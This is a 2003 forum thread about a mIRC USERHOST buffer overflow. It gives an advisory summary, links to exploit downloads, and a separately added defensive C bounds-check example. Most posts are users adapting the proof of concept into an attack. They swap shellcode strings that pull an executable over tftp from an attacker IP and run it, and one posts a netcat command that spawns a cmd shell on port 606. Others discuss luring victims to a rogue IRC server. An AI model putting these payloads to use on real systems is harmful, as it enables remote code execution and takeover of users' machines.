flame
:D works like charm


10x
vnet576
QUOTE (Arnie @ Oct 3 2003, 01:29 AM)
QUOTE (vnet576 @ Oct 3 2003, 01:26 AM)
Hmmm...I tried this proof of concept on my own pc. I connected to my pc with mirc. However it just crashed mirc without actually spawning a shell.

same here, anyone else getting any shells? ;)
it also opened my calc.exe btw :D

Guess I'm not vulnerable since it didn't even open my calc :unsure:
agopsi
It has been reported that mIRC may be prone to a remote buffer overflow vulnerability due to insufficient boundary checking. The issue is reported to present itself when the client attempts to connect to a remote server. During the connection process the client is reported to send a USERHOST request that is expected to be less than 110 bytes. A buffer overflow condition may occur if the server responds with a request that is larger than 110 bytes.

Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the client in order to gain unauthorized access to a vulnerable system.

mIRC versions 6.01 to 6.1 have been reported to be prone to this issue, however other versions may be affected as well.

Exploit code has been provided and can be downloaded from the following location:

http://whiteroof.netfirms.com/userhost.zip
=======================
http://online.securityfocus.com/bid/8728
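
The boundary check the advisory above says is missing, as an added example that is not part of the thread and is not mIRC's code. The helper name, the use of the 110-byte figure as the buffer size, and applying the limit to the trailing parameter of the 302 (RPL_USERHOST) reply are assumptions; the sample lines are constructed.

```c
#include <stdio.h>
#include <string.h>

#define USERHOST_BUF 110 /* assumption: the advisory's 110-byte figure */

enum { UH_OK = 0, UH_NOT_USERHOST = -1, UH_TOO_LONG = -2 };

/* Hypothetical helper (not mIRC code): copy the trailing parameter of an
 * RPL_USERHOST (numeric 302) line into out, rejecting oversized replies. */
int copy_userhost_reply(const char *line, char *out, size_t outsz)
{
    const char *p = line;
    size_t len;

    if (outsz == 0)
        return UH_TOO_LONG;
    out[0] = '\0';
    if (*p == ':') {                    /* skip optional ":server " prefix */
        p = strchr(p, ' ');
        if (p == NULL)
            return UH_NOT_USERHOST;
        p++;
    }
    if (strncmp(p, "302 ", 4) != 0)     /* only handle USERHOST replies */
        return UH_NOT_USERHOST;
    p = strstr(p, " :");                /* trailing parameter follows " :" */
    if (p == NULL)
        return UH_NOT_USERHOST;
    p += 2;
    len = strcspn(p, "\r\n");           /* payload length without CRLF */
    if (len >= outsz)                   /* bound check before any copy */
        return UH_TOO_LONG;
    memcpy(out, p, len);
    out[len] = '\0';
    return UH_OK;
}

int main(void)
{
    /* Constructed sample lines, not captured traffic. */
    char out[USERHOST_BUF], big[256] = ":irc.example.test 302 me :";
    size_t n = strlen(big);

    memset(big + n, 'x', 150);          /* 150-byte payload, over the limit */
    big[n + 150] = '\0';
    printf("%d\n", copy_userhost_reply(":irc.example.test 302 me :me=+u@h.example\r\n", out, sizeof out));
    printf("%d\n", copy_userhost_reply(big, out, sizeof out));
    return 0;
}
```

An oversized reply is refused before any byte is copied, so the caller can drop the line or the connection instead of crashing.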
vnet576
Hmmm...I tried this proof of concept on my own pc. I connected to my pc with mirc. However it just crashed mirc without actually spawning a shell.
Arnie
QUOTE (vnet576 @ Oct 3 2003, 01:26 AM)
Hmmm...I tried this proof of concept on my own pc. I connected to my pc with mirc. However it just crashed mirc without actually spawning a shell.

same here, anyone else getting any shells? ;)
it also opened my calc.exe btw :D
flame
only ver 6.1 is exploited and no u cant get a shell with this proof of concept
but i guess u can just put your own Shell
thalinx
Hmm, yea

calc.exe ran :D .. (6.03 over here) does anyone know how this proof of concept works and how anyone could put in other shellcode?

grtz,

linx
fluffibunni
thx
r00l
QUOTE

Directly downloading images is not permitted on the Netfirms FREE plan. If you are the owner of this site, either ensure that this image is embedded in a web page, or upgrade to one of the Netfirms premium plans.


that's what it gives me when trying to d/l the userhost.zip file ;[
upload it to the files download section pls

10x
r00l
no need to do that. already succeeded to d/l it.
thanx anyway! :D
thatsmej
QUOTE (thalinx @ Oct 3 2003, 07:35 AM)
Hmm, yea

calc.exe ran :D .. (6.03 over here) does anyone know how this proof of concept works and how anyone could put in other shellcode?

grtz,

linx

why you want that?

you need someone to connect to your box...

btw,
why is the exploit written in VB :s
relax
just kills mirc.exe (6.3)
fastburner


db "tftp.exe -i 127.0.0.1 GET 1.exe c:\1.exe",0


but how can i start the .. 1.exe ??
relax
get people to connect to the ircd on your ip
thatsmej
QUOTE (fastburner @ Oct 3 2003, 11:28 AM)
db "tftp.exe -i 127.0.0.1 GET 1.exe c:\1.exe",0


but how can i start the .. 1.exe ??

same thing,
only then you need to copy a few asm lines above..
or you can try..

db "tftp.exe -i 127.0.0.1 GET 1.exe c:\1.exe && 1.exe"


just give it a shot ;)
fastburner
i've changed

db "calc.exe",0

to

db "tftp.exe -i YOURIP GET 1.exe c:\1.exe",0

when somebody connects ... he downloads the 1.exe to his c:\ ... drive but how can i execute the 1.exe !!??
Arnie
same thing here, anyone found a way yet?
Arnie
tftp -i 127.0.0.1 get nc c:\nc.exe & c:\nc -vv -l -p 606 -e cmd

... that command works when I use it here in dos!
it downloads nc.exe and spawns a shell
but...
The exploit wont work anymore if I use that line
just tftp -i 127.0.0.1 get nc c:\nc.exe or just c:\nc -vv -l -p 606 -e cmd works fine but when using both the exploit fails

anyone ? :)
agopsi
Hello, i edited this exploit and it crashes mIRC32 v5.91 ;) If you want you may edit this exploit and crash all versions of mirc or 5.9 and 6.*
raptor
yes but how do we change this and make it run other file than calc.exe ?
(i want run a file on the remote system that exists)
i just don't know how...
i changed calc.exe with the full path and .exe i want and clicked save compile and finally encode but at last calc.exe is still called!!!
what should i do?
coder
does no one know of a *nix port for this code?

bleh damn visual basic!

i hate porting BASIC to Perl :(
raptor
can somebody help me?
soupy
http://www.securitylab.ru/_exploits/userhost.zip for those who missed.

It works. But since you have to have someone connected to your "ircd" server how can this be useful? How can you trap someone? The best you can have is poor clients, never servers or domain controllers...
DJVASTVASTY2K
Yo Agopsi

Sup Dawwwwg.

Damn, This Is A Nice Little Code Here I Am Sure If Can Gain Axx To Target Sys Maybe Can Run A /Script In Mirv Via Load Dump Remote File.

Good Post

Best Regards

V457 G5M T34M